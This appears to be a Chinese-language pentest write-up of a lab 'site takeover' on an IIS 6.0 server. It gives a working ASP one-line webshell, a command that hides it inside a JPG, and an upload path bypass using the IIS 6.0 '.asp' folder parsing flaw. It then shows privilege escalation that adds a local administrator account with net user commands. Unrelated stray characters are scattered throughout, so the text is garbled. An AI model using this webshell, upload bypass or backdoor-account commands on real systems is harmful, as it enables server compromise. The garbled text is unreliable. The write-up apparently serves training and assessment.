記錄自己的第一次完整拿站
環(huán)境:公司內網虛擬環(huán)境
等級:基礎入門工作考核
注:此處操作省略部分信息收集和其它漏洞測試步驟
如:
后門尋找:目錄枚舉獲得
賬號密碼:sql注入獲得
??? 服務器信息:sql注入獲得
(一)WebShell
管理界面提供了完整的服務器信息,包含數(shù)據庫文件地址
瀏覽后臺我們發(fā)現(xiàn)存在大量的上傳界面掂恕,所以上傳漏洞變成了我們的切入點
嘗試發(fā)現(xiàn)只支持圖片類型上傳
嘗試一:圖片馬上傳 ?
語句:
一句話asp馬:<%eval request("a")%>
制作圖片馬:copy 2.jpg/b + 1.asp/a 1.jpg
上傳結果是我們的圖片馬被重命名拖陆,無法正常執(zhí)行
嘗試二:
我們之前的信息搜集中已經發(fā)現(xiàn)IIS版本6.0,
這里可以聯(lián)想到IIS 6.0的解析漏洞
這里簡單科普:
IIS 6.0解析漏洞主要有兩種:漏洞1:在網站下建立文件夾的名字為 *.asp懊亡、*.asa 的文件夾依啰,其目錄內的任何擴展名的文件都被 IIS 當作 asp 文件來解析并執(zhí)行。例如創(chuàng)建目錄 vidun.asp店枣,那么 /vidun.asp/1.jpg 將被當作 asp 文件來執(zhí)行速警。IIS解析漏洞2:網站上傳圖片的時候叹誉,將網頁木馬文件的名字改成“*.asp;.jpg”,也同樣會被 IIS 當作 asp 文件來解析并執(zhí)行闷旧。例如上傳一個圖片文件长豁,名字叫“vidun.asp;.jpg”的木馬文件,該文件可以被當作 asp 文件解析并執(zhí)行忙灼。
關于第二種解析漏洞匠襟,我們可以構造“1.asp;.jpg”文件,然而結果顯而易見该园,文件會被重命名宅此,并不是我們想要的asp文件。
所以我們的關注點回到第一種解析漏洞上來:
關鍵詞:文件夾創(chuàng)建
我們繼續(xù)后臺發(fā)現(xiàn)爬范,數(shù)據備份界面提供了數(shù)據庫功能父腕,而且還提供了文件夾自動創(chuàng)建功能
所以,新的嘗試開始青瀑。
我們在圖片文件夾(upfile)下創(chuàng)建了一個新的文件夾song.asp
然后重新進行之前的上傳圖片馬操作璧亮,
并使用burpsuite改包修改圖片馬上傳位置到/upfile/song.asp/下
我們可以看到是我們想要的路徑,并且斥难,文件被重名了了枝嘶,不過沒有關系~
接下來,掏出珍藏版過刀菜狗(手動滑稽)
注:使用被修改后的文件名連接
連接成功哑诊!
(二)提權
使用菜刀上傳asp大馬 / cmd命令工具 / pr 工具
借助asp馬運行cmd
借助pr工具創(chuàng)建系統(tǒng)用戶并提權
net user xxx 123456 /add
net localgroup administrators xxx /add
tasklist /svc
netstat -nao
使用賬號密碼遠程登陸
注:像此處window server 2003可能會遇到服務器超出最大允許連接數(shù)的情況原因是我們平時在使用服務器操作系統(tǒng)的時候群扶,往往是登錄遠程桌面后是直接關閉遠程桌面窗口,而不是選擇注銷的方式來退出镀裤,那么實際上遠程會話并沒有釋放掉竞阐,而是繼續(xù)保留在服務器端,這樣就會占用總的鏈接數(shù)暑劝。當這個數(shù)量達到最大允許值時就會出現(xiàn)超過遠程連接會話數(shù)骆莹,從而導致其它用戶無法登錄到系統(tǒng)。
解決方式:mstsc /admin (強行注銷其他用戶并登陸)
